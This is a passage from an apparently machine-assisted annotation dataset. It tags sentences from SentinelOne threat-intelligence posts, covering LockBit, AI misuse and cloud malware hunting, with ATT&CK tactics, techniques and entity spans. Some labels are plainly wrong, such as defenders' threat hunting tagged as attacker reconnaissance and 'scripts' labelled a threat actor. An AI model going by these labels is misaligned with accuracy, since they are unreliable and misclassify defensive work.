"72_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "In addition, alarm was raised this month after a response to a breach at AnyDesk found evidence of compromised production systems.\nCVEs and updates that organizations are prioritizing include :\nEmerging Trends and Tactics AI continues to push the boundaries of cybersecurity for both attackers and defenders.", "sentence_text": "On top of LLM chat assistants and natural language image generators comes Sora , the first generative AI model that can create realistic video – currently up to 60 seconds – from text prompts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s10-5552cb", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "On top of LLM chat assistants and natural language image generators comes Sora , the first generative AI model that can create realistic video – currently up to 60 seconds – from text prompts.", "sentence_text": "According to OpenAI, “Sora is capable of generating entire videos all at once or extending generated videos to make them longer.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s11-459348", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "According to OpenAI, “Sora is capable of generating entire videos all at once or extending generated videos to make them longer.”", "sentence_text": "The potential for deep fakes in an election year is one obvious area of concern, but the wider implications of a text-to-video service are perhaps even greater.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s12-976c42", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "The potential for deep fakes in an election year is one obvious area of concern, but the wider implications of a text-to-video service are perhaps even greater.", "sentence_text": "Sora is still in beta but is currently available to red teamers to help assess the potential risks such a service could cause.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s13-326a68", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Sora is still in beta but is currently available to red teamers to help assess the potential risks such a service could cause.", "sentence_text": "Groups associated with four different nations were discovered to be trying to leverage OpenAI for harmful purpose:\nThe use of AI by threat actors largely revolves around improving productivity and automating existing tasks that are labor intensive, such as generating social engineering content.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s14-ae56ca", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Groups associated with four different nations were discovered to be trying to leverage OpenAI for harmful purpose:\nThe use of AI by threat actors largely revolves around improving productivity and automating existing tasks that are labor intensive, such as generating social engineering content.", "sentence_text": "To date, it has not been used to produce novel attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s15-454f15", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "To date, it has not been used to produce novel attacks.", "sentence_text": "However, we are still very much in the early stages of understanding the capabilities of this new technology.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s16-9a803a", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "However, we are still very much in the early stages of understanding the capabilities of this new technology.", "sentence_text": "The fact that it is already being leveraged by both state-sponsored actors and financially-motivated cybercriminals emphasizes the need for defenders to keep pace with AI’s evolution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s17-a17bf4", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "The fact that it is already being leveraged by both state-sponsored actors and financially-motivated cybercriminals emphasizes the need for defenders to keep pace with AI’s evolution.", "sentence_text": "For specific TTPs related to artificial intelligence systems, see the new MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s18-175ec9", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "For specific TTPs related to artificial intelligence systems, see the new MITRE ATLAS™ (Adversarial Threat Landscape for Artificial-Intelligence Systems) framework.", "sentence_text": "Law Enforcement & Policy | Significant Actions The U.S government in February announced a Visa Restriction policy for individuals involved in the misuse of commercial spyware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s19-edb7b1", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "Law Enforcement & Policy | Significant Actions The U.S government in February announced a Visa Restriction policy for individuals involved in the misuse of commercial spyware.", "sentence_text": "The move reflects mounting concerns about the rise of private sector offensive actors ( aka hack-for-hire groups) and the safety of mobile devices Coordinated action by U.S. and U.K. law enforcement to disrupt LockBit operations generated plenty of headlines in the third week of February, but early signs are that the group is not down and out yet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s20-19cd02", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "The move reflects mounting concerns about the rise of private sector offensive actors ( aka hack-for-hire groups) and the safety of mobile devices Coordinated action by U.S. and U.K. law enforcement to disrupt LockBit operations generated plenty of headlines in the third week of February, but early signs are that the group is not down and out yet.", "sentence_text": "The group claimed the FBI was unable to compromise all of their infrastructure, allowing the group to reestablish and maintain primary operations.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "reestablish and maintain primary operations", "entities": [ { "text": "The group", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "their infrastructure", "start": 58, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "reestablish and maintain primary operations.", "start": 102, "end": 146, "label": "Action" } ] }, { "uid": "sentinel-72_SentinelOne_report-p1-s21-8151d2", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "The group claimed the FBI was unable to compromise all of their infrastructure, allowing the group to reestablish and maintain primary operations.", "sentence_text": "The statements included functional links to a blog site and data portals to support their claims that the ransomware operator was still in business.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "included functional links to a blog site and data portals", "entities": [ { "text": "ransomware operator", "start": 106, "end": 125, "label": "ThreatActor" }, { "text": "blog site ", "start": 46, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "data portals", "start": 60, "end": 72, "label": "Infrastructure_Indicator" }, { "text": "included functional links", "start": 15, "end": 40, "label": "Action" }, { "text": " to support their claims ", "start": 72, "end": 97, "label": "Action" } ] }, { "uid": "sentinel-72_SentinelOne_report-p1-s22-0f362b", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "The statements included functional links to a blog site and data portals to support their claims that the ransomware operator was still in business.", "sentence_text": "Conclusion\nCoordinated action by the U.S. and other governments is certainly having an impact on cybercriminals’ operations, but there are still more threat actors out there than anyone can count, and there’s a long way to go in this battle to capture, thwart and discourage digital attackers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s23-31c225", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Conclusion\nCoordinated action by the U.S. and other governments is certainly having an impact on cybercriminals’ operations, but there are still more threat actors out there than anyone can count, and there’s a long way to go in this battle to capture, thwart and discourage digital attackers.", "sentence_text": "Malware Family Unearthed Read More Get a demo", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s24-c8fd46", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "Malware Family Unearthed Read More Get a demo", "sentence_text": "Defeat every attack, at every stage of the threat lifecycle with SentinelOne Book a demo and see the world’s most advanced cybersecurity platform in action.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s25-937271", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "Defeat every attack, at every stage of the threat lifecycle with SentinelOne Book a demo and see the world’s most advanced cybersecurity platform in action.", "sentence_text": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s26-f5e241", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "Get Demo\nSentinelLabs\nSentinelLabs: Threat Intel & Malware Analysis", "sentence_text": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-72_SentinelOne_report-p1-s27-ef6046", "source": "sentinel", "doc_id": "72_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "We are hunters, reversers, exploit developers, & tinkerers shedding light on the vast world of malware, exploits, APTs, & cybercrime across all platforms.", "sentence_text": "VISIT SITE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s1-602969", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Perhaps more strikingly different than Windows versus Linux threats, cloud services are targeted through entirely different methods altogether.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Target cloud services using different methods", "entities": [ { "text": "cloud services", "start": 69, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "targeted through entirely different methods", "start": 88, "end": 131, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s2-3dc620", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "Perhaps more strikingly different than Windows versus Linux threats, cloud services are targeted through entirely different methods altogether.", "sentence_text": "At\nLABScon 2024\n, I gave a workshop Taxonomy in the Troposphere that outlines categories of cloud threats and how to approach analyzing and hunting them.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" } ], "procedure": "Analyze and hunt cloud threats", "entities": [ { "text": "cloud threats", "start": 92, "end": 105, "label": "Infrastructure_Indicator" }, { "text": " analyzing and hunting them.", "start": 125, "end": 153, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s3-6ab169", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "At\nLABScon 2024\n, I gave a workshop Taxonomy in the Troposphere that outlines categories of cloud threats and how to approach analyzing and hunting them.", "sentence_text": "The workshop structure highlighted three general sections to approach this problem:\nWhat cloud malware looks like Cloud malware taxonomy and exercises How to approach threat hunting in the cloud What Does Cloud Malware Look Like?", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" } ], "procedure": "Hunting cloud threats", "entities": [ { "text": "Cloud Malware", "start": 205, "end": 218, "label": "Infrastructure_Indicator" }, { "text": "approach threat hunting in the cloud", "start": 158, "end": 194, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s4-9713fe", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "The workshop structure highlighted three general sections to approach this problem:\nWhat cloud malware looks like Cloud malware taxonomy and exercises How to approach threat hunting in the cloud What Does Cloud Malware Look Like?", "sentence_text": "Cloud threats are tailored for the specific environment or service being targeted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s5-ee885d", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Cloud threats are tailored for the specific environment or service being targeted.", "sentence_text": "There are no comprehensive infostealers as are commonplace on platforms like macOS or Windows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s6-84fb2f", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "There are no comprehensive infostealers as are commonplace on platforms like macOS or Windows.", "sentence_text": "Instead, individual facets of cloud security are targeted through a variety of means.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s7-de1d7e", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "Instead, individual facets of cloud security are targeted through a variety of means.", "sentence_text": "Attackers run scripts remotely that interact with the targeted service’s API to achieve a goal like collecting credentials or automating the process of sending spam messages in bulk through a cloud or SaaS provider.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Attackers execute scripts remotely to interact with service APIs for credential collection or automated spam campaigns.", "entities": [ { "text": "Attackers", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "run scripts remotely", "start": 10, "end": 30, "label": "Action" }, { "text": "interact with the targeted service’s API", "start": 36, "end": 76, "label": "Action" }, { "text": "collecting credentials", "start": 100, "end": 122, "label": "Action" }, { "text": "service’s API", "start": 63, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s8-6e9557", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "Attackers run scripts remotely that interact with the targeted service’s API to achieve a goal like collecting credentials or automating the process of sending spam messages in bulk through a cloud or SaaS provider.", "sentence_text": "We also explored the objectives of cloud attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s9-0817cf", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "We also explored the objectives of cloud attacks.", "sentence_text": "Actors frequently rely on web application or SaaS misconfigurations that enable access to resources that should be restricted.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploiting web application or SaaS misconfigurations to access restricted resources", "entities": [ { "text": "Actors", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "web application", "start": 26, "end": 41, "label": "Infrastructure_Indicator" }, { "text": "SaaS", "start": 45, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "misconfigurations that enable access to resources that should be restricted.", "start": 50, "end": 126, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s10-d4393d", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "Actors frequently rely on web application or SaaS misconfigurations that enable access to resources that should be restricted.", "sentence_text": "Examples of this include exposed environment files–a very common occurrence in Laravel implementation–as well as exposed Jenkins instances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s11-20b2c6", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "Examples of this include exposed environment files–a very common occurrence in Laravel implementation–as well as exposed Jenkins instances.", "sentence_text": "Exploitation of unpatched security vulnerabilities is perennially popular given the high prevalence of web frameworks running in cloud services.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploitation of unpatched security vulnerabilities in cloud-hosted web frameworks", "entities": [ { "text": "web frameworks", "start": 103, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "Exploitation of unpatched security vulnerabilities", "start": 0, "end": 50, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s12-33cd62", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "Exploitation of unpatched security vulnerabilities is perennially popular given the high prevalence of web frameworks running in cloud services.", "sentence_text": "My colleagues at SentinelOne recently published an excellent summary of the most commonly leveraged cloud threat vectors, which complimented this workshop’s focus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s13-353676", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "My colleagues at SentinelOne recently published an excellent summary of the most commonly leveraged cloud threat vectors, which complimented this workshop’s focus.", "sentence_text": "Cloud Malware Taxonomy & Analysis Taxonomy in the cloud can be difficult because many tools are based on full source code and actors often take a feature from one tool and roll it into another one.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s14-2a923c", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "Cloud Malware Taxonomy & Analysis Taxonomy in the cloud can be difficult because many tools are based on full source code and actors often take a feature from one tool and roll it into another one.", "sentence_text": "This makes attribution complicated, if not challenging.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s15-026122", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "This makes attribution complicated, if not challenging.", "sentence_text": "Because these tools are not deployed on the victim machine and are run on the attacker’s system, it can be unclear which tool used the code first.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Run attack tools on attacker-controlled system", "entities": [ { "text": " attacker", "start": 77, "end": 86, "label": "ThreatActor" }, { "text": "tools ", "start": 14, "end": 20, "label": "MalwareTool" }, { "text": "run on the attacker’s system, ", "start": 67, "end": 97, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s16-9a506e", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "Because these tools are not deployed on the victim machine and are run on the attacker’s system, it can be unclear which tool used the code first.", "sentence_text": "While these can be valuable indicators for detection, they leave much to be desired in the way of seeing how actors implement their tooling.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Implement custom tooling", "entities": [ { "text": "actors", "start": 109, "end": 115, "label": "ThreatActor" }, { "text": "tooling.", "start": 132, "end": 140, "label": "MalwareTool" }, { "text": "implement their tooling.", "start": 116, "end": 140, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s17-10a152", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "While these can be valuable indicators for detection, they leave much to be desired in the way of seeing how actors implement their tooling.", "sentence_text": "Analyzing cloud tools can be complex because some scripts are very large.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Analyze cloud tools", "entities": [ { "text": "cloud tools", "start": 10, "end": 21, "label": "MalwareTool" }, { "text": "scripts", "start": 50, "end": 57, "label": "ThreatActor" }, { "text": "Analyzing", "start": 0, "end": 9, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s18-6365df", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "Analyzing cloud tools can be complex because some scripts are very large.", "sentence_text": "I have analyzed several scripts with more than 10,000 lines of code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s19-6e894f", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "I have analyzed several scripts with more than 10,000 lines of code.", "sentence_text": "To make this task more manageable, researchers can take several approaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s20-b90056", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "To make this task more manageable, researchers can take several approaches.", "sentence_text": "One of my preferred methods is to perform a word frequency analysis that eliminates terms commonly used by the programming language of the script, revealing terms that are used highly frequently or infrequently.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s21-d789bf", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "One of my preferred methods is to perform a word frequency analysis that eliminates terms commonly used by the programming language of the script, revealing terms that are used highly frequently or infrequently.", "sentence_text": "I use a Python script designed to analyze Python files for the occurrence of each term.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s22-12c09b", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "I use a Python script designed to analyze Python files for the occurrence of each term.", "sentence_text": "Running this script against a modified version of Legion Stealer attributed to actor CobraEgy was quite helpful in reducing the volume of noise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s23-e8a493", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Running this script against a modified version of Legion Stealer attributed to actor CobraEgy was quite helpful in reducing the volume of noise.", "sentence_text": "The CobraEgy script contains more than 21,000 lines of Python code–a very daunting analysis task.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s24-4219f1", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "The CobraEgy script contains more than 21,000 lines of Python code–a very daunting analysis task.", "sentence_text": "The word frequency analysis script gave 3400 lines of words and the frequency they occurred.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s25-237f85", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "The word frequency analysis script gave 3400 lines of words and the frequency they occurred.", "sentence_text": "While this is still large, it’s easy to scroll through the results and find interesting terms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s26-ca541f", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "While this is still large, it’s easy to scroll through the results and find interesting terms.", "sentence_text": "Once you identify potentially interesting functionality, you can analyze those features.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s27-c3de7d", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "Once you identify potentially interesting functionality, you can analyze those features.", "sentence_text": "Researchers can then cross-reference the search results against the original script, revealing its functionality.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s28-ca1a5c", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "Researchers can then cross-reference the search results against the original script, revealing its functionality.", "sentence_text": "In this case, the azure.json hit was part of a larger credential file targeting list.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s29-1fa0b1", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "In this case, the azure.json hit was part of a larger credential file targeting list.", "sentence_text": "The hardcoded username and password were used to connect to a C2 server to upload the data harvested from the system.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" }, { "id": "T1552.001", "name": "Credentials In Files" } ], "procedure": "Exfiltrate data via C2 using credentials", "entities": [ { "text": "C2 server", "start": 62, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "connect to a C2 server to upload the data harvested", "start": 49, "end": 100, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s30-8ecacb", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "The hardcoded username and password were used to connect to a C2 server to upload the data harvested from the system.", "sentence_text": "We also took a high level look at a Docker container that was used in TeamTNT’s 2023 SilentBob campaign .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s31-ce4c35", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "We also took a high level look at a Docker container that was used in TeamTNT’s 2023 SilentBob campaign .", "sentence_text": "Docker containers are composed of layers: the container’s operating system is in the first layer, while subsequent layers are generated by instructions in the Dockerfile.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s32-66d8b5", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Docker containers are composed of layers: the container’s operating system is in the first layer, while subsequent layers are generated by instructions in the Dockerfile.", "sentence_text": "Docker Desktop\nis a free tool that provides a nice interface for high-level analysis of a container’s features.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s33-69f3a9", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "Docker Desktop\nis a free tool that provides a nice interface for high-level analysis of a container’s features.", "sentence_text": "Researchers can select the Docker image on the Images tab, then look at the layers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s34-78abd4", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "Researchers can select the Docker image on the Images tab, then look at the layers.", "sentence_text": "In the case of this container used by TeamTNT, there are 9 layers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s35-f167eb", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "In the case of this container used by TeamTNT, there are 9 layers.", "sentence_text": "Several layers have a command, which is shown on the Command pane.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s36-86a5fa", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "Several layers have a command, which is shown on the Command pane.", "sentence_text": "Researchers can mount the image–which I recommend doing in an isolated malware analysis environment–and copy the files to the local system for analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s37-efe433", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "Researchers can mount the image–which I recommend doing in an isolated malware analysis environment–and copy the files to the local system for analysis.", "sentence_text": "Hunting in the Cloud The workshop concluded by summarizing which artifacts from cloud tools can be hunted, as well as two types of hunting approaches: targeted and wide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s38-7bd020", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Hunting in the Cloud The workshop concluded by summarizing which artifacts from cloud tools can be hunted, as well as two types of hunting approaches: targeted and wide.", "sentence_text": "In the following example from FBot, the tool makes requests to a Lithuanian fashion designer’s website– robertkalinkin[.]com –to validate Paypal accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110", "name": "Brute Force" } ], "procedure": "Credential validation via web requests", "entities": [ { "text": "FBot", "start": 30, "end": 34, "label": "ThreatActor" }, { "text": "FBot", "start": 30, "end": 34, "label": "MalwareTool" }, { "text": "robertkalinkin[.]com", "start": 104, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "makes requests to", "start": 45, "end": 62, "label": "Action" }, { "text": "to validate Paypal accounts.", "start": 126, "end": 154, "label": "Action" } ] }, { "uid": "sentinel-73_SentinelOne_report-p1-s39-db7488", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "In the following example from FBot, the tool makes requests to a Lithuanian fashion designer’s website– robertkalinkin[.]com –to validate Paypal accounts.", "sentence_text": "The wide hunting approach looks for behavior, so researchers can identify new malware families conducting specific activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-73_SentinelOne_report-p1-s40-731da6", "source": "sentinel", "doc_id": "73_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "The wide hunting approach looks for behavior, so researchers can identify new malware families conducting specific activities.", "sentence_text": "The rule also filters for script file types, which are more likely to be associated with cloud attack tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null 